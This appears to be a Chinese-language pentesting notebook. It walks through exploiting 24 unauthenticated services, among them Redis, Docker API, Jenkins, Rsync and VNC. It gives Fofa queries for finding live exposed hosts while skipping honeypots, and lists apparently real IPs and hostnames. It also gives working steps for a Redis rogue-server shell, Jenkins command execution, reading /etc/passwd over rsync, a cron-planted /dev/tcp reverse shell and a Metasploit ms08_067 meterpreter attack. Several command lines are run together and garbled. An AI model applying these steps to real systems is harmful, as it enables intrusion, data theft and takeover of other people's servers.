一、Redis未授权访问漏洞
第一步:进⼊vulhub⽬录使⽤以下命令启动靶机
进⼊⽬录:cd /vulhub-master/redis/4-unacc
启动:docker-compose up -d
检查:docker ps
第二步:在Kali上安装redis程序进⾏服务的链接
#安装redis
apt-get install redis
#redis链接
redis-cli -h 8.155.8.82 -p 6379
#redis常⻅命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使⽤select num可以查看键值数据。
(5)设置变量:set test "whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称
第三步:可以直接连接执⾏命令且不需要认证说明存在未授权访问漏洞....下载以下攻击项⽬
git clone https://github.com/n0b0dyCN/redis-rogue-server
第四步:使⽤⼯具执⾏以下命令获取⽬标的命令执⾏环境,交互时输⼊ i 键会获取Shell环境
python3 redis-rogue-server.py --rhost 8.155.8.82 --lhost 8.155.8.82
第一次开启环境可能会报错 再执行一次就可以成功进入
i是正向反弹
二、MongoDB未授权访问漏洞
步骤⼀:在Kali上执⾏以下命令搭建起MongoDB的漏洞环境..
拉取镜像:docker pull mongo
启动容器:docker run -d -p 27017:27017 --name mongodb mongo
查看容器:docker ps -a
步骤⼆:使⽤Nmap的插件脚本进⾏扫描...发现存在未授权访问漏洞.
步骤三:也可尝试使⽤MSF中的模块进⾏漏洞测试....不需要认证即可直接连接...
use auxiliary/scanner/mongodb/mongodb_login
show options
set rhosts 8.155.8.82
set threads 15
exploit
步骤四:即存在未授权访问漏洞使⽤Navicat进⾏连接...
三、Memcached未未授权访问漏洞
步骤⼀:下载Memcached程序并执⾏以下命令..启动Memcached漏洞环境
#Memcached程序下载
https://www.runoob.com/memcached/window-install-memcached.html
#执⾏命令
memcached.exe -d install
memcached.exe -d start
要使用管理员身份运行cmd
步骤⼆:使⽤Telnet程序探测⽬标的11211端⼝...
#Telnet探测
telnet 172.16.0.176 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 39 0 //获得缓存key
get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容,造成敏感信息泄露
步骤三:使⽤Nmap程序的脚本进⾏漏洞扫描....
nmap -p 11211 --script memcached-info 172.16.0.176
四、Zookeeper未授权访问漏洞
步骤⼀:使⽤以下Fofa语法搜索资产信息....
port="2181" && "Zookeeper" && country="US"
步骤⼆:在Kali中使⽤以下命令进⾏未授权访问漏洞测试
echo envi | nc ip 端口
步骤三:可使⽤Zookeeper可视化管理⼯具进⾏连接....
#⼯具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
五、Jenkins未授权访问漏洞
步骤⼀:使⽤以下fofa语法进⾏产品搜索..
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
步骤⼆:在打开的URL中...点击 Manage Jenkins --> Scritp Console 在执⾏以下命令...
#执⾏命令
println "whoami" .execute().text
六、Jupyter NoteBook未授权访问漏洞
步骤⼀:通过以下fofa语法进⾏产品搜索....或使⽤vulhub启动靶场.
#fofa语法
"Jupyter Notebook" && port="8888" && "terminals"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d
步骤⼆:如果存在未授权访问漏洞则直接访问 http://IP:8888 会直接跳到web管理界⾯,不需要 输⼊密码。
步骤三:从 New -> Terminal 新建⼀个终端,通过新建的终端可执⾏任意命令
七、Elasticsearch未授权访问漏洞
步骤⼀:使⽤以下Fofa语法进⾏Elasticsearch产品搜索...
"Elasticsearch" && port="9200"
步骤⼆:存在未授权访问则直接进⼊到信息⻚⾯....不需要输⼊⽤户密码登陆
步骤三:可按照上⾯查看节点信息等
http://ID:端口/version
八、Kibana未授权访问漏洞
步骤⼀:使⽤以下Fofa语句搜索Kibana产品...并打开⻚⾯
"kibana" && port="5601"
步骤⼆:直接访问Kibana的⻚⾯且⽆需账号密码可以登陆进⼊界⾯
九、Docker Remote API未授权访问漏洞
步骤⼀:使⽤以下Fofa语句对Docker产品进⾏搜索
port="2375" && "docker"
步骤⼆:直接使⽤浏览器访问以下路径...
apt install docker-clihttp://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息
#eg
http://ID/info
http://ID:2375/info
步骤三:使⽤-H参数连接⽬标主机的docker,使⽤ps命令查询⽬标系统运⾏的镜像
docker -H tcp://130.61.230.9:2375 ps
docker -H tcp://130.61.230.9:2375 version
docker -H tcp://130.61.230.9:2375 exec -it 1f4 /bin/bash
操作思路:
docker pull 下载有Docker逃逸的容器下来
docker逃逸间接获取安装docker主机控制权限
十、Kubernetes Api Server未授权访问漏洞
步骤⼀:使⽤以下Fofa语法搜索Kubernetes产品....
port="8080" && app="Kubernetes"
步骤⼆:在打开的⽹⻚中直接访问 8080 端⼝会返回可⽤的 API 列表
十一、Hadoop未授权访问漏洞
步骤⼀:使⽤以下FoFA语法进⾏Hadoop产品的搜索
port="8088" && app="Hadoop"
步骤⼆:开启⻚⾯直接访问不经过⽤户密码验证....
十二、ActiveMQ未授权访问漏洞
步骤⼀:使⽤以下Fofa语法搜索产品...
body="ActiveMQ" && port="8161"
步骤⼆:ActiveMQ默认使⽤8161端⼝,默认⽤户名和密码是 admin/admin ,在打开的⻚⾯输⼊
#⽤户登陆
http://ID:8161/admin/
http://ID:8161/admin/
http://ID:8161/admin/
admin admin 登录成功
十三、RabbitMQ未授权访问漏洞
步骤⼀:使⽤以下Fofa语法对RabbitMQ产品进⾏搜索...
port="15672"
port="15692"
port="25672"
步骤⼆:在打开的⻚⾯中可输⼊默认的账号和密码进⾏登陆
默认账号密码都是guest
http://x.x.x.x:15672
http://x.x.x.x:25672
http://x.x.x.x:15692
#eg
http://bzgx.yuyiying.com:15672/
http://ID:15672
https://ID:25672/#/
十四、Springboot Actuator未授权访问漏洞
步骤⼀:使⽤以下Fofa语句搜索资产并打开⻚⾯访问
#Fofa语法
icon_hash="116323821"
#eg
http://2.sureyong.com:9999/#/
步骤⼆:当 web 应⽤程序出现 4xx、5xx 错误时显示类似以下⻚⾯就能确定当前 web 应⽤是使⽤了
springboot 框架....
步骤三:拼接以下路径查看泄露的数据..
访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等),如果存在登录⽤户的操作
请求,可以伪造cookie进⾏登录。
访问/env端点获取全部环境属性,由于 actuator 会监控站点 mysql、mangodb 之类的数据库服
务,所以通过监控信息有时可以mysql、mangodb 数据库信息,如果数据库正好开放在公⽹,那么造
成的危害是巨⼤的。
git 项⽬地址泄露,这个⼀般是在/health 路径,⽐如如下站点,访问其 health 路径可探测到站
点 git 项⽬地址。
十五、FTP未授权访问漏洞(匿名登陆)
步骤⼀:对⽬标环境在资源管理器中⽤以下格式访问...如果该服务器开启了匿名登陆,则可直接进⾏内容查看
ftp://ip:port/
步骤二:本机开启ftp匿名访问前后对比
开启前
开启后
十六、JBoss未授权访问漏洞 *
步骤⼀:使⽤以下语法搜索Jboss产品并打开其⻚⾯....
title="Welcome to JBoss"
步骤⼆:拼接以下路径且⽆需认证直接进⼊控制⻚⾯
#拼接路径
http://ip:port/jmx-console/
#eg
http://177.67.128.116//jmx-console/
http://117.193.144.108:8080/jmx-console/
http://119.8.196.187:8080/jmx-console/
admin admin弱密码登录
十七、Ldap未授权访问漏洞
步骤⼀:使⽤以下Fofa语法搜索使⽤ldap服务的产品....并通过Ldapadmin可视化⼯具做连接验证
#Fofa语法
port="389"
#Ldapadmin⼯具
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/
步骤⼆:启动⼯具并测试存在未授权的LDAP服务...成功如下
步骤三:连接⽬标LDAP服务并查看其内容
十八、Rsync未授权访问漏洞 *
步骤⼀:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!!!
# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up -d
步骤⼆:可使⽤Nmap扫描该端⼝是否开启服务,还可以使⽤Metasploit中关于允许匿名访问的rsync 扫描模块进⾏探测...
# nmap命令
nmap -p 873 --script rsync-list-modules ipaddress
# Metasploit模块
auxiliary/scanner/rsync/modules_list
步骤三:使⽤命令进⾏链接并读取⽂件....
rsync rsync://8.155.7.133:873/
rsync rsync://8.155.7.133:873/src/
步骤四:对系统中的敏感⽂件下载操作.... /etc/passwd
rsync rsync://8.155.7.133:873/src/etc/passwd
rsync rsync://8.155.7.133:873/src/etc/passwd /var/www/html
步骤五:上传⽂件...如果有相应的jsp/asp/php环境可以写⼀句话以phpinfo为例...
echo "1" >1.txt
ls
rsync ./1.txt rsync://8.155.7.133:873/src/
rsync rsync://8.155.7.133:873/src/
步骤六:反弹shell...在此可利⽤定时任务cron来反弹获取shell
查看定时任务
rsync rsync://8.155.7.133/src/etc/crontab
将定时任务下载下来
rsync rsync://8.155.7.133/src/etc/crontab /var/www/html创建shell文件
echo 1>1.txtvim 1.txt#!/bin/bash
/bin/bash -i >& /dev/tcp/8.155.7.133/8888 0>&1mv 1.txt shell
cat shell
授权shell文件
chmod 777 shell
上传shell 至靶机
rsync -av ./shell rsync://8.155.7.133:873/src/etc/cron.hourly
攻击机开启nc监听响应端口
下载的定时任务文件
创建shell文件 设置监听ID
上传shell至监听机器
攻击机开启nc监听
十九、VNC未授权访问漏洞
步骤⼀:使⽤以下语句在Fofa上进⾏资产收集
(port="5900") && (is_honeypot=false && is_fraud=false)
步骤⼆:可通过MSF中的模块进⾏检测与漏洞利⽤
# VNC未授权检测
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts ID
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
# VNC密码爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts ID
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆
破
msf6 auxiliary(scanner/vnc/vnc_login) > run
# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
67_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
r/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts ID
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost ID
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
获取会话后,直接run vnc可控制远程虚拟机
# 直接控制远程机器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost ID
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit
步骤三:VNC链接验证
vncviewer ipaddress
二十、Dubbo未授权访问漏洞
步骤⼀:使⽤以下语句在Fofa上进⾏资产收集
(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)
步骤⼆:使⽤Telnet程序直接进⾏链接测试
telent IP port
二十一、NSF共享⽬录未授权访问
步骤⼀:使⽤以下语句在Fofa上进⾏资产收集
"nfs"
步骤⼆:执⾏命令进⾏漏洞复现
#安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享⽬录
showmount -e 192.168.126.130
#挂载相应共享⽬录到本地
mount -t nfs 192.168.126.130:/grdata /mnt
#卸载⽬录
umount /mnt
二十二、Druid未授权访问漏洞
步骤⼀:使⽤以下语句在Fofa与Google上进⾏资产收集....
# Fofa
title="Druid Stat Index"
# PHPINFO⻚⾯
inurl:phpinfo.php intitle:phpinfo()
info.php test.php# Druid未授权访问
inurl:"druid/index.html" intitle:"Druid Stat Index"
步骤⼆:对访问到的站点查看
步骤三:Druid批量扫描脚本...
https://github.com/MzzdToT/CVE-2021-34045
二十三、CouchDB未授权访问
步骤⼀:使⽤以下语句在Fofa上进⾏资产收集....或开启Vulhub靶场进⾏操作
# 搜索语法
(port="5984") && (is_honeypot=false && is_fraud=false)
# Vulhub靶场
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d
步骤⼆:执⾏未授权访问测试命令
curl 192.168.1.4:5984
curl 192.168.1.4:5984/_config
步骤三:反弹Shell参考
https://blog.csdn.net/qq_45746681/article/details/108933389
二十四、RTSP未授权访问漏洞
步骤⼀:使⽤以下语句在Fofa上进⾏资产收集
(port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"
步骤⼆:使用工具vlc-3.0.19连接
尝试弱密码